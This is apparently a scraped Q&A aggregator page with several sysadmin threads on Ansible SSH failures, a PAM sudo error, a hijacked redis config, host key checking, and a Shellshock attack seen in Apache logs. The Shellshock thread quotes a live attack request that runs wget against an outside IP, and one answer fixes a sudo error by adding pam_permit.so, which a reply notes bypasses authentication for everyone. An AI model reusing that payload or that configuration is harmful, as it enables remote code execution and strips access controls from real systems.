How Do I Make Ansible Retry on SSH Errors?

How Do I Make Ansible Retry on SSH Errors? - ssh

I am occasionally getting SSH failures in my Ansible 2.6.19 playbook during operations that that use file or copy with large with_items. Several items will succeed then at some point I will get
Shared connection to xxx.xyz.com closed
sudo: PAM account management error: Authentication service cannot retrieve authentication info
Then 2 seconds later there is a SUCCESS message for each of the rest of the files. This suggests to me that something must have happened on the server to cause the issue and then it resolved itself.
I have pipelining = True in my ansible.cfg.
How do I make Ansible playbook try again on SSH errors like this so the playbook doesn't fail?
EDIT: To address the comment, I am investigating the source but since I don't have control of it I need a backup. The retry/until is at the task level, however, there are too many tasks to put it on each one. I really need something at a playbook level. e.g. in ansible.cfg

One option at configuration level is use retry files. This will allow you to rerun the playbooks with the --limit #path/to/retry-file option.
Excerpt from ansible.cfg:
retry_files_enabled = True
retry_files_save_path = ~/.ansible-retry
This will cause a <playbook>.retry file to be created (in ~/.ansible-retry/ directory) when a playbook failure occurs. Though it doesn't make Ansible automatically retry, the playbook can be rerun with --limit option to cover the hosts on which failure occurred. This can be combined with error handling (as #Zeitounator commented).
The other option is to use the wait_for_connection module.
- name: wait for connection to host for 2 mins
wait_for_connection:
timeout: 120

Related

pam_unix(sudo:auth): conversation failed, auth could not identify password for [username]

I'm using ansible to provision my Centos 7 produciton cluster. Unfortunately, execution of below command results with ansible Tiemout and Linux Pluggable Authentication Modules (pam) error conversation failed.
The same ansible command works well, executed against virtual lab mad out of vagrant boxes.
Ansible Command
$ ansible master_server -m yum -a 'name=vim state=installed' -b -K -u lukas -vvvv
123.123.123.123 | FAILED! => {
"msg": "Timeout (7s) waiting for privilege escalation prompt: \u001b[?1h\u001b=\r\r"
}
SSHd Log
# /var/log/secure
Aug 26 13:36:19 master_server sudo: pam_unix(sudo:auth): conversation failed
Aug 26 13:36:19 master_server sudo: pam_unix(sudo:auth): auth could not identify password for [lukas]

I've found the problem. It turned out to be PAM's auth module problem! Let me describe how I got to the solution.
Context:
I set up my machine for debugging - that is I had four terminal windows opened.
1st terminal (local machine): Here, I was executing ansible prduction_server -m yum -a 'name=vim state=installed' -b -K -u username
2nd terminal (production server): Here, I executed journalctl -f (system wide log).
3rd terminal (production server): Here, I executed tail -f /var/log/secure (log for sshd).
4th terminal (production server): Here, I was editing vi /etc/pam.d/sudo file.
Every time, I executed command from 1st terminal I got this errors:
# ansible error - on local machine
Timeout (7s) waiting for privilege escalation prompt error.
# sshd error - on remote machine
pam_unix(sudo:auth): conversation failed
pam_unix(sudo:auth): [username]
I showed my entire setup to my colleague, and he told me that the error had to do something with "PAM". Frankly, It was the first time that I've heard about PAM. So, I had to read this PAM Tutorial.
I figured out, that error relates to auth interface located in /etc/pam.d/sudo module. Diging over the internet, I stambled upon this pam_permit.so module with sufficient controll flag, that fixed my problem!
Solution
Basically, what I added was auth sufficient pam_permit.so line to /etc/pam.d/sudo file. Look at the example below.
$ cat /etc/pam.d/sudo
#%PAM-1.0
# Fixing ssh "auth could not identify password for [username]"
auth sufficient pam_permit.so
# Below is original config
auth include system-auth
account include system-auth
password include system-auth
session optional pam_keyinit.so revoke
session required pam_limits.so
session include system-auth
Conclusion:
I spent 4 days to arrive to this solution. I stumbled upon over a dozens solutions that did not worked for me, starting from "duplicated sudo password in ansible hosts/config file", "ldap specific configuration" to getting advice from always grumpy system admins!
Note:
Since, I'm not expert in PAM, I'm not aware if this fix affects other aspects of the system, so be cautious over blindly copy pasting this code! However, if you are expert on PAM please share with us alternative solutions or input. Thanks!

Assuming the lukas user is a local account, you should look at how the pam_unix.so module is declared in your system-auth pam file. But more information about the user account and pam configuration is necessary for a specific answer.
While adding auth sufficient pam_permit.so is enough to gain access. Using it in anything but the most insecure test environment would not be recommended. From the pam_permit man page:
pam_permit is a PAM module that always permit access. It does nothing
else.
So adding pam_permit.so as sufficient for authentication in this manner will completely bypass the security for all users.

Found myself in the same situation, tearing my hair out. In my case, hidden toward the end of the sudoers file, there was the line:
%sudo ALL=(ALL:ALL) ALL
This undoes authorizations that come before it. If you're not using the sudo group then this line can safely be deleted.

I had this error since upgrading sudo to version 1.9.4 with pacman. I hadn't noticed that pacman had provided a new sudoers file.
I just needed to merge /etc/sudoers.pacnew.
See here for more details: https://wiki.archlinux.org/index.php/Pacman/Pacnew_and_Pacsave
I know that this doesn't answer the original question (which pertains to a Centos system), but this is the top Google result for the error message, so I thought I'd leave my solution here in case anyone stumbles across this problem coming from an Arch Linux based operating system.

I got the same error when I tried to restart apache2 with sudo service apache2 restart
When logging into root I was able to see the real error lied with the configuration of apache2. Turned out I removed a site's SSL-Certificate files a few months ago but didn't disable the site in apache2. a2dissite did the trick.

redis snapshot location not as specified in config

After running fine for a while, I am getting write error on my redis instance:
(error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.
In the log I see:
9948:C 22 Mar 20:49:32.241 # Failed opening the RDB file root (in server root dir /var/spool/cron) for saving: Read-only file system
However, my redis config file is /etc/redis/redis.conf as confirmed by:
redis-cli -p 6379 info | grep 'config_file'
config_file:/etc/redis/redis.conf
And there I have:
dir /mnt/data/redis
And indeed, there is a snapshot there.
But despite the above, redis now thinks my data directory is
redis-cli -p 6379 CONFIG GET dir
1) "dir"
2) "/var/spool/cron"
Corresponding to the error I was getting as quoted above.
Can anyone tell me why/how my data directory is changing after redis starts, such that it is no longer what is specified in the config file?

So the answer is that the redis server was hacked and the configuration changed, which is very easy to do as it turns out. (I should point out that I had no reason to think it wasn't easy to do. I just assumed security by obscurity was sufficient in this case--wrong. No matter, this was just a playground not any sort of production server).
So don't open your redis port to the world. Use security groups if on AWS to limit access to machines that need it, or use AUTH (which is still not awesome because then all clients need to know the single password which also apparently gets sent in the clear), or have some middleware controlling access.
Hacking redis is easy to do, can compromise your data, and even enable unauthorized SSH access to your server. And that's why you shouldn't highline.

Configuration of Running Redis Instance in Swisscom CloudFoundry

I am trying to read the configuration of the running Redis instance. I want to better understand how Redis is configured, especially in regard to persistence settings.
I have successfully connected to the running Redis instance (SSH tunnel) and try to execute the following command:
CONFIG GET *
CONFIG GET appendonly
However, I get the message
ERR unknown command 'CONFIG'
If I invoke the command "CONFIG GET" without any parameters I get the message
Invalid input argument for command: 'CONFIG GET', passed 0 arguments, must be in range 1 - 1
So the command is known. Seems to be a permission issue!? Is there a way to get the configuration?

The current Redis offering (march 2019) has the following settings for persistency:
appendonly yes
appendfsync everysec
It runs with 2 replicas.
Please note that this allies to the current service offering of Swisscom and might change in the future.

Ansible ask to verify the ssh fingerprint and fails to ssh into newly created ec2 instance

I am creating ec2 instances and configuring them using ansible scripts. I have used
[ssh_connection]
pipelining=true
in my ansible.cfg file but it still asks to verify the ssh fingerprint, when I type yes and press enter it fails to login to the instance.
Just to let you know I am using ansible dynamic inventory and hence am not storing IPs or dns in hosts file.
Any help will be much appreciated.
TIA

Pipelining doesn't have any effect on authentication - it bundles up individual module calls into one bigger file to transfer over once a connection has been established.
In order not to stop execution and prompt you to accept the SSH key, you need to disable strict host key checking, not enable pipelining.
You can set that by exporting ANSIBLE_HOST_KEY_CHECKING=False or set it in ansible.cfg with:
[defaults]
host_key_checking=False
The latter is probably better for your use case, because it's persistent.
Note that even though this is a setting that deals with ssh connections, it is in the [defaults] section, not the [ssh_connection] one.
==
The fact that when you type yes you fail to log in makes it seem like this might not be your only problem, but you haven't given enough information to solve the rest.
If you're still having connection issues after disabling host key checking, edit the question to add the output of you SSHing into the instance manually, alongside the output of an ansible play with -vvv for verbose output.
First steps to look through when troubleshooting:
What are the differences between when I connect and when Ansible does?
Is the ansible_ssh_user set to the right user for the ec2 instance?
Is the ansible_ssh_private_key_file the same as the private part of the keypair you assigned the instance on creation?
Is ansible_ssh_host set correctly by whatever is generating your dynamic inventory?

I think you can find the answer here: ansible ssh prompt known_hosts issue
Basically, when you run ansible-playbook, you will need to use the argument:
ANSIBLE_HOST_KEY_CHECKING=False
Make sure you have your private key added (ssh-add your_private_key).

How can one prevent Apache executing the request line as a bash command?

I'm running several virtual hosts on Apache 2.2.22 and just noticed a rather alarming incident in the logs where a "security scanner" from Iceland was able to wget a file into a cgi-bin directory with the following http request line:
() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"
It effectively downloaded the file in question.
Could any one explain how this request manages to actually execute the bash command ?
Naturally, the cgi-bin shouldn't be writable, but it would still be helpful to understand how this type of exploit functions and if there isn't some way to change the Apache configuration parameters so that request commands are never executed ...
This may be unrelated, but several hours later, there has begun a stream of strange requests from the internal interface, occurring every 2 seconds:
host: ":443" request: "NICK netply" source ip: 127.0.0.1

This is a vulnerability in bash which is exposed via Apache referred to as the "Shellshock" or "bash bug" and allows an attacker to execute arbitrary commands both locally and remotely making it a very serious vulnerability.
You need to update bash, but you are showing signs of an already compromised system. For more information on shellshock including detection and fixing, see:
digitalocean.com
shellshocker.net

We Keep Coding

sql objective-c vba vb.net react-native apache vue.js tensorflow api pandas